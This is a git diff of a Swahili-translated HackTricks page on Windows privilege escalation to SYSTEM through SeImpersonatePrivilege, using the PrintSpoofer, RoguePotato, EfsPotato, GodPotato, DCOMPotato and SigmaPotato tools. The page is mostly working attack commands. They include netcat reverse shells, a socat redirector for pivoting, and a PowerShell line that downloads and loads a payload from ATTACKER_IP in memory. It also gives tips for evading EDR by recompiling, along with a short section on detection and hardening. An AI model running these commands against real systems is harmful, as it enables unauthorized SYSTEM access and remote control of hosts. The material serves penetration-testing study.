Translated ['src/windows-hardening/windows-local-privilege-escalation/ro

2025-10-10 18:36:50 +00:00 · 2025-08-28 20:33:13 +00:00 · 2025-08-28 20:33:13 +00:00 · e98fea6456
commit e98fea6456
parent a787989864
1 changed files with 88 additions and 3 deletions
--- a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
@ -2,9 +2,45 @@

 {{#include ../../banners/hacktricks-training.md}}

-> [!WARNING] > **JuicyPotato haitumiki** kwenye Windows Server 2019 na Windows 10 build 1809 kuendelea. Hata hivyo, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** zinaweza kutumika **kuongeza mamlaka sawa na kupata ufikiaji wa kiwango cha `NT AUTHORITY\SYSTEM`**. Hii [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) inaelezea kwa undani kuhusu zana ya `PrintSpoofer`, ambayo inaweza kutumika kuboresha mamlaka ya uigaji kwenye Windows 10 na Server 2019 ambapo JuicyPotato haitumiki tena.
+> [!WARNING]
+> **JuicyPotato haifanyi kazi** kwenye Windows Server 2019 na Windows 10 build 1809 na baadaye. Hata hivyo, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** zinaweza kutumika kupata vibali sawa na kupata upatikanaji wa ngazi ya `NT AUTHORITY\SYSTEM`. Posti hii ya blogi (https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) inachunguza kwa kina zana ya `PrintSpoofer`, ambayo inaweza kutumika kuabusu vibali vya kuiga (impersonation) kwenye mashine za Windows 10 na Server 2019 ambapo JuicyPotato haifanyi kazi tena.

-## Quick Demo
+> [!TIP]
+> Chaguo la kisasa linalodumishwa mara kwa mara katika 2024–2025 ni SigmaPotato (fork ya GodPotato) ambalo linaongeza matumizi ya in-memory/.NET reflection na msaada wa OS uliopanuliwa. Angalia matumizi ya haraka hapa chini na repo katika References.
+
+Related pages for background and manual techniques:
+
+{{#ref}}
+seimpersonate-from-high-to-system.md
+{{#endref}}
+
+{{#ref}}
+from-high-integrity-to-system-with-name-pipes.md
+{{#endref}}
+
+{{#ref}}
+privilege-escalation-abusing-tokens.md
+{{#endref}}
+
+## Mahitaji na mambo ya kuzingatia
+
+Mbinu zote zinazofuata zinategemea kuabusu huduma yenye uwezo wa kuiga (impersonation-capable) yenye vibali kutoka kwa muktadha unaoshikilia moja ya vibali vifuatavyo:
+
+- SeImpersonatePrivilege (ya kawaida zaidi) au SeAssignPrimaryTokenPrivilege
+- High integrity haitegemeeki ikiwa token tayari ina SeImpersonatePrivilege (kawaida kwa akaunti nyingi za service kama IIS AppPool, MSSQL, n.k.)
+
+Angalia vibali haraka:
+```cmd
+whoami /priv | findstr /i impersonate
+```
+Vidokezo vya uendeshaji:
+
+- PrintSpoofer needs the Print Spooler service running and reachable over the local RPC endpoint (spoolss). Katika mazingira yaliyothibitishwa kwa usalama ambapo Spooler imezimwa baada ya PrintNightmare, pendelea RoguePotato/GodPotato/DCOMPotato/EfsPotato.
+- RoguePotato requires an OXID resolver reachable on TCP/135. Ikiwa egress imezuiwa, tumia redirector/port-forwarder (see example below). Older builds needed the -f flag.
+- EfsPotato/SharpEfsPotato hutumia MS-EFSR; ikiwa pipe moja imezuiwa, jaribu pipes mbadala (lsarpc, efsrpc, samr, lsass, netlogon).
+- Kosa 0x6d3 wakati wa RpcBindingSetAuthInfo kawaida inaonyesha huduma ya uthibitishaji ya RPC isiyojulikana/isiyoungwa mkono; jaribu pipe/transport tofauti au hakikisha huduma ya lengo inaendeshwa.
+
+## Demo ya Haraka

 ### PrintSpoofer
 ```bash
@ -21,12 +57,24 @@ c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
 NULL

 ```
+Vidokezo:
+- Unaweza kutumia -i kuzindua mchakato wa mwingiliano katika console ya sasa, au -c kuendesha one-liner.
+- Inahitaji Spooler service. Ikiwa imezimwa, hii itashindwa.
+
 ### RoguePotato
 ```bash
 c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
 # In some old versions you need to use the "-f" param
 c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
 ```
+Ikiwa outbound 135 imezuiwa, pivot OXID resolver kupitia socat kwenye redirector yako:
+```bash
+# On attacker redirector (must listen on TCP/135 and forward to victim:9999)
+socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
+
+# On victim, run RoguePotato with local resolver on 9999 and -r pointing to the redirector IP
+RoguePotato.exe -r REDIRECTOR_IP -e "cmd.exe /c whoami" -l 9999
+```
 ### SharpEfsPotato
 ```bash
 > SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
@ -63,17 +111,52 @@ CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes su

 nt authority\system
 ```
+Kidokezo: Ikiwa pipe moja itashindwa au EDR itazuia, jaribu pipes nyingine zinazounga mkono:
+```text
+EfsPotato <cmd> [pipe]
+pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
+```
 ### GodPotato
 ```bash
 > GodPotato -cmd "cmd /c whoami"
 # You can achieve a reverse shell like this.
 > GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
 ```
+Vidokezo:
+- Inafanya kazi kwenye Windows 8/8.1–11 na Server 2012–2022 wakati SeImpersonatePrivilege ipo.
+
 ### DCOMPotato

 ![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa)

-## References
+DCOMPotato inatoa aina mbili zinazolenga obyekti za DCOM za huduma ambazo kwa chaguo-msingi huwa na RPC_C_IMP_LEVEL_IMPERSONATE. Jenga au tumia binaries zilizotolewa na endesha amri yako:
+```cmd
+# PrinterNotify variant
+PrinterNotifyPotato.exe "cmd /c whoami"
+
+# McpManagementService variant (Server 2022 also)
+McpManagementPotato.exe "cmd /c whoami"
+```
+### SigmaPotato (tawi la GodPotato lililosasishwa)
+
+SigmaPotato inaongeza vipengele vya kisasa kama in-memory execution kupitia .NET reflection na msaidizi wa PowerShell reverse shell.
+```powershell
+# Load and execute from memory (no disk touch)
+[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe"))
+[SigmaPotato]::Main("cmd /c whoami")
+
+# Or ask it to spawn a PS reverse shell
+[SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))
+```
+## Vidokezo vya utambuzi na kuimarisha usalama
+
+- Fuatilia michakato inayounda named pipes na mara moja kuita token-duplication APIs ikifuatiwa na CreateProcessAsUser/CreateProcessWithTokenW. Sysmon inaweza kuonyesha telemetry muhimu: Event ID 1 (process creation), 17/18 (named pipe created/connected), na command lines zinazozalisha child processes kama SYSTEM.
+- Kuimarisha Spooler: Kuzima huduma ya Print Spooler kwenye servers ambapo haifai kunahitajika kunazuia coerctions za ndani za aina ya PrintSpoofer kupitia spoolss.
+- Kuimarisha akaunti za huduma: Punguza utoaji wa SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege kwa custom services. Fikiria kuendesha services chini ya virtual accounts zenye least privileges zinazohitajika na kuzitenga kwa kutumia service SID na write-restricted tokens inapowezekana.
+- Udhibiti wa mtandao: Kuzuia outbound TCP/135 au kupunguza trafiki ya RPC endpoint mapper kunaweza kuvunja RoguePotato isipokuwa internal redirector inapatikane.
+- EDR/AV: Zana hizi zote zina saini zinazotambulika kwa wingi. Recompiling kutoka source, kubadilisha symbols/strings, au kutumia in-memory execution kunaweza kupunguza utambuzi lakini haitavunja behavioral detections thabiti.
+
+## Marejeo

 - [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
 - [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer)
@ -82,5 +165,7 @@ nt authority\system
 - [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
 - [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
 - [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)
+- [https://github.com/tylerdotrar/SigmaPotato](https://github.com/tylerdotrar/SigmaPotato)
+- [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)

 {{#include ../../banners/hacktricks-training.md}}